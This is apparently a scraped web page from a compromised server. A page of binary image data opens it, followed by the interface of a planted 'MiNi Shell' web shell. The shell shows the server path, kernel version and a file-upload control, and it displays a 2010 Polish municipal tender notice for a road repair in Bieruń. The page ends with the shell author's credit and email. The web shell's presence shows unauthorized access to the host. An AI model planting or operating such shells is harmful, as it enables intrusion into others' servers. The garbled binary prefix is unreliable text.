JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100820/258336-N-2010.html

<p class="kh_header"><b>Bieruń: Remont drogi po powodzi - ul. Wiślana w Bieruniu - Bijasowicach; etap I - od ul. Jagiełły do firmy GRANITEX ul. Wiślana 17</b><br>
<b>Numer ogłoszenia: 258336 - 2010; data zamieszczenia: 20.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi po powodzi - ul. Wiślana w Bieruniu - Bijasowicach; etap I - od ul. Jagiełły do firmy GRANITEX ul. Wiślana 17.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont drogi po powodzi - ul. Wiślanej w Bieruniu - Bijasowicach. Zakres robót obejmuje remont nawierzchni ul. Wiślanej, udrożnienie zamulonych rowów                   i przepustów, regulację wysokościową urządzeń drogowych.
Łączna długość remontowanego odcinka drogi - 300,0 mb.
Zaleca się dokonać wizji lokalnej w terenie przed przystąpieniem do robót.


1.	Zakres rzeczowy 
Zakres robót został określony  w przedmiarze robót i specyfikacji technicznej i obejmuje : 
1.Roboty pomiarowe.
2.Roboty drogowe - rozbiórkowe, ziemne i nawierzchniowe:
a) roboty rozbiórkowe: nawierzchnia z betonu asfaltowego - 911,8m2 oraz płyt z betonu cementowego - 830 m2; 
b) wykopy mechaniczne, ręczne, wykonanie koryta na całej szerokości jezdni, profilowanie 
i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni - 1737,5m2;
c) odtworzenie warstwy odsączającej z piasku, wzmocnionej geowłókniną separacyjną typu Fibertex 200 lub równoważną;
d)  odtworzenie podbudowy z kruszywa łamanego stabilizowanego mechanicznie (warstwa górna 
     i dolna podbudowy);
e) odtworzenie nawierzchni drogi z betonu asfaltowego wraz z poboczami utwardzonymi kruszywem ;
f)  powtórne użycie części gruntu z korytowania do utworzenia nasypu drogowego i ukształtowania 
     karp; 
g) wywóz gruzu wraz z jego utylizacją, natomiast płyty z betonu cementowego są materiałem  Zamawiającego i podlegają składowaniu w wyznaczonym miejscu;
h)  badania nośności.
3.Roboty instalacyjne na drogach: regulacja pionowa studzienek dla włazów kanałowych, regulacja   
   pionowa studzienek dla zaworów wodociągowych i gazowych.
   Odwodnienie jezdni i poboczy drogi będzie zapewnione poprzez zaprojektowane spadki podłużne i poprzeczne jezdni z wyprowadzeniem wody częściowo do rowów przydrożnych 
a częściowo na pobocza, gdzie zostanie rozsączona.
4.Roboty porządkowe, czyszczenie terenu, oczyszczanie rowów, wznowienie ewentualnie 
    niszczonych w trakcie robót budowlanych kamieni granicznych.
5.W pasie drogowym istnieje gęste uzbrojenie: kabel energetyczny, gazociąg, wodociąg, kanalizacja sanitarna. W celu zlokalizowania ww. instalacji należy dokonać ręcznych przekopów kontrolnych i sprawdzić głębokość posadowienia istniejącego uzbrojenia.
6.Po zakończeniu robót Wykonawca zobowiązany jest przekazać wykonane zadanie Zamawiającemu w terminie odbioru robót wraz z oświadczeniami właścicieli posesji, którzy 
z modernizowaną drogą graniczą, że nie wnoszą zastrzeżeń co do granic i stanu przyległego terenu po wykonaniu robót.

2.	       Warunki i wymagania:
Dokładny zakres prac określono w dokumentacji projektowej, przedmiarze robót, specyfikacji technicznej, które są załącznikiem do niniejszej SIWZ.
Jeżeli w dokumentacji technicznej, specyfikacji technicznej (ST) oraz SIWZ określone zostały materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane w projekcie i specyfikacji technicznej wykonania i odbioru robót. 
Podane w opisach nazwy własne nie mają na celu naruszenia art.29 i 7 ustawy Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych
zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego poziomu jakościowego, technologicznego i wydajnościowego.
Zabudowane i dostarczone materiały budowlane i instalacyjne muszą posiadać wszystkie wymagane Prawem budowlanym i polskimi normami, przenoszącymi zharmonizowane normy europejskie, atesty, certyfikaty i aprobaty techniczne.
Zamawiający nie przewiduje zawarcia umowy ramowej, aukcji elektronicznej.
Powyższe roboty objęte są podatkiem VAT w wysokości 22%.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie art. 67 ust. 1 pkt. 6 ustawy w przypadku pozyskania nowych środków na sfinansowanie kolejnego etapu remontu ul. Wiślanej, do wysokości 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.11.13.00-1, 45.11.12.13-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie                                                                         
       przedłożonego przez Wykonawcę oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy Pzp).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie niezbędne do realizacji tego zamówienia, tzn. w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej                                                                                                                                           działalności jest krótszy - to w tym okresie -wykonali zgodnie z zasadami sztuki budowlanej            i prawidłowo ukończyli roboty  remontowe lub inwestycyjne  w zakresie  budowy lub modernizacji dróg, chodników, parkingów lub placów o nawierzchni z betonu asfaltowego              o łącznej wartości brutto min. 500 000,00 zł .

      Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie 
       Przedłożonego prze Wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 2 ustawy Pzp)
-  dokumentów - wykazu wykonanych robót  remontowych lub inwestycyjnych  w zakresie  budowy lub modernizacji dróg, chodników, parkingów lub placów o nawierzchni z betonu asfaltowego               o  łącznej wartości brutto min. 500 000,00 zł .
oraz dokumentów (np. referencji) potwierdzających, że roboty te zostały wykonane zgodnie            z zasadami sztuki budowlanej i prawidłowo ukończone .

Za wykonali zamawiający rozumie, że roboty  zostały zakończone i odebrane protokołami końcowymi odbioru robót w ostatnich pięciu latach przed upływem terminu składania ofert,           a jeżeli okres jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie przedłożonego przez Wykonawcę oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy Pzp).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia, tzn. dysponują co najmniej jedną
       osobą posiadającą uprawnienia bez ograniczeń do kierowania robotami drogowymi, która 
       będzie uczestniczyć w wykonaniu zamówienia.

       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie 
        przedłożonego przez Wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy Pzp)
- dokumentu - wykazu osób, które będą  uczestniczyć w wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia.

       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie          
        przedłożonego przez Wykonawcę oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy Pzp).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie z art. 22 ust. 1 ustawy, że :
1.	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	posiada wiedzę i doświadczenie potrzebną do wykonania zamówienia; 
3.	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4. znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie     zamówienia;
2. Oświadczenie, że nie podlega wykluczeniu z ubiegania się o udzielenie zamówienia              publicznego na podstawie art. 24 ust.1 Prawa zamówień publicznych.

3. Oferta jest jawna w całości / części. Strony oferty od ....     do .....    stanowią tajemnicę       przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą być ujawnione innym uczestnikom postępowania.
     W przypadku braku złożenia oświadczenia Zamawiający uzna, że oferta Wykonawcy jest jawna w całości.

4.  Oświadczenie, czy część zamówienia zostanie powierzona podwykonawcom.

5. Oświadczenie podmiotów występujących wspólnie (konsorcjum, spółka cywilna) -                    w przypadku ich udziału w postępowaniu.

        6. Oświadczenie osoby/ osób podpisujących ofertę, że jest / są uprawniona/ -e do zaciągania 
zobowiązań i składania oświadczeń w imieniu Wykonawcy.
        
       7. Oświadczenie o zapoznaniu się z treścią SIWZ i jej akceptacji.
       8. Oświadczenie o terminie związania ofertą.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy w zakresie:
1.	zmiany terminu rozpoczęcia lub zakończenia wykonania przedmiotu umowy; w szczególności zmiana terminów wykonywania robót budowlanych z powodu: niesprzyjających warunków atmosferycznych (opady deszczu, śniegu), zmiany przepisów, braku możliwości zakupu materiałów niezbędnych do prowadzenia robót, przedłużające się procedury związane                 z uzyskaniem koniecznych uzgodnień, opinii i decyzji;
2.	zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem wymagań, jakie osoby te powinny spełniać, określone  w SIWZ;
3.	zmiany ceny ofertowej , jeżeli wystąpi konieczność wykonania robót zamiennych na podstawie protokołu zatwierdzonego przez   strony umowy lub w przypadku zmiany VAT;
4.	innych zmian nie wykraczających poza zakres określony w art. 140 ust. 1 ustawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych
43-150 Bieruń
ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2010 godzina 12:00, miejsce: Urząd Miejski w Bieruniu - kancelaria (parter)
43-150 Bieruń
ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com